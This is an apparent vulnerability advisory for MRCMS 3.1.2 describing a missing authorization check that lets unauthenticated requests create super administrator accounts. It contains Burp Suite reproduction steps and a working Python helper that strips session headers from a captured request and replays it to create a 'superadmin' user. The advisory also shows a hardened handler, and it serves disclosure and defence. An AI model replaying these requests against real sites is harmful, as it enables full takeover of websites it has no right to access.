MRCMS Access Control Vulnerability Allowing Unauthorized Super Administrator Account Creation

Vulnerability

An access control vulnerability exists in MRCMS version 3.1.2. The save() method of UserController performs no authorization check before persisting the submitted user record, so the server accepts the request regardless of who sends it. An unauthenticated request to this endpoint can therefore create a super administrator account, which is sufficient for a complete compromise of the website.
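The following is an added illustrative model, not MRCMS source code: a Python stand-in for a user-management save handler in the shape the advisory describes (no authorization check) beside a hardened form that authenticates the caller and binds the authorization decision to the caller's session role rather than to anything in the submitted form. The session table, role names, request and store types are all constructed here so the example runs offline.

```python
from dataclasses import dataclass, field
from typing import Dict, Optional

SUPER_ADMIN = "superadmin"  # assumed role name for the example

# Constructed session table for the example: cookie value -> role of the logged-in user.
SESSIONS: Dict[str, str] = {
    "sess-admin": SUPER_ADMIN,
    "sess-editor": "editor",
}


@dataclass
class Request:
    """A minimal request: submitted form fields plus the session cookie (None when absent)."""
    form: Dict[str, str]
    cookie: Optional[str] = None


@dataclass
class UserStore:
    """Stand-in for the CMS user table: username -> role."""
    users: Dict[str, str] = field(default_factory=dict)


def save_user_vulnerable(req: Request, store: UserStore) -> int:
    """Shape of the flaw the advisory describes: the handler persists whatever the
    form says, including role=superadmin, without asking who is calling.
    Returns an HTTP status code."""
    store.users[req.form["username"]] = req.form["role"]
    return 200


def caller_role(req: Request) -> Optional[str]:
    """Resolve the caller's role from the session cookie; None if unauthenticated."""
    if req.cookie is None:
        return None
    return SESSIONS.get(req.cookie)


def save_user_hardened(req: Request, store: UserStore) -> int:
    """Same handler with the missing check: authenticate first, then make an explicit
    authorization decision from the caller's role, never from the form contents."""
    role = caller_role(req)
    if role is None:
        return 401  # no or invalid session: reject before touching the store
    if role != SUPER_ADMIN:
        return 403  # user management is a super-admin-only function
    store.users[req.form["username"]] = req.form["role"]
    return 200


def demo():
    """Send the unauthenticated super-admin creation request to both handlers.
    Returns {handler: (status, account_created)}."""
    attack = Request(form={"username": "attacker", "role": SUPER_ADMIN})  # no cookie at all
    vuln, hard = UserStore(), UserStore()
    return {
        "vulnerable": (save_user_vulnerable(attack, vuln), "attacker" in vuln.users),
        "hardened": (save_user_hardened(attack, hard), "attacker" in hard.users),
    }


if __name__ == "__main__":
    print(demo())
```

The point of the hardened version is that the role check runs on every call to the save handler, server-side, before any write; hiding the user-management page from non-administrators in the UI does nothing against a replayed request.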

Impact

Exploitation of this vulnerability lets an unauthenticated attacker create a super administrator account and then log in with it, gaining full control over the MRCMS website and its content.

Reproduction

To reproduce this vulnerability, use Burp Suite to intercept the request that the user management interface sends when saving a new user. Remove the authentication (session) cookie from the request and resend it. The super administrator account is still created, which confirms that the check is missing on the server side rather than only in the interface; verify by viewing the user list or logging in with the new account.
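The following is an added helper for the reproduction step above, not part of the advisory: it takes a raw HTTP request as copied from Burp Suite, strips the session-bearing headers, rebuilds the request with a correct Content-Length, and can replay it with the standard library alone. The captured request embedded here is constructed for the example; its host, path (/admin/user/save) and form field names are placeholders, not values taken from MRCMS.

```python
import http.client
from typing import Dict, Iterable, Tuple

# Constructed sample of an intercepted save request. Host, path and fields are placeholders.
CAPTURED = (
    "POST /admin/user/save HTTP/1.1\r\n"
    "Host: cms.example.test\r\n"
    "Cookie: JSESSIONID=0123456789ABCDEF\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 49\r\n"
    "\r\n"
    "username=attacker&password=P%40ss&role=superadmin"
)


def parse_raw_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            continue
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return method, path, headers, body


def strip_auth(headers: Dict[str, str],
               names: Iterable[str] = ("Cookie", "Authorization")) -> Dict[str, str]:
    """Return a copy of the headers without the ones that carry the session."""
    drop = {n.lower() for n in names}
    return {k: v for k, v in headers.items() if k.lower() not in drop}


def build_raw(method: str, path: str, headers: Dict[str, str], body: str) -> str:
    """Reassemble a raw request; Content-Length is recomputed from the body."""
    hdrs = {k: v for k, v in headers.items() if k.lower() != "content-length"}
    if body:
        hdrs["Content-Length"] = str(len(body.encode()))
    lines = [f"{method} {path} HTTP/1.1"] + [f"{k}: {v}" for k, v in hdrs.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def replay(method: str, path: str, headers: Dict[str, str], body: str,
           host: str, use_tls: bool = False, timeout: float = 10.0) -> Tuple[int, bytes]:
    """Send the (already stripped) request to host and return (status, response body).
    Not exercised offline; call it against a test instance you are authorised to assess."""
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, timeout=timeout)
    conn.request(method, path, body=body.encode(), headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read()


def unauthenticated_copy(raw: str) -> str:
    """The full transformation: parsed, session headers removed, request rebuilt."""
    method, path, headers, body = parse_raw_request(raw)
    return build_raw(method, path, strip_auth(headers), body)


if __name__ == "__main__":
    print(unauthenticated_copy(CAPTURED))
```

A 401 or 403 on the replayed request means the endpoint does check the session; a 200 or redirect alone is not proof either way, so confirm the outcome in the user list as the reproduction step says.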

Added: Apr 7, 2026, 7:10 PM
Updated: Apr 7, 2026, 7:10 PM

Vulnerability Rating

Custom Algorithm

spread          1.0
impact          5.0
exploitability  9.7
remediation     0.0
relevance       5.4
threat          6.4
urgency         2.9
incentive       8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.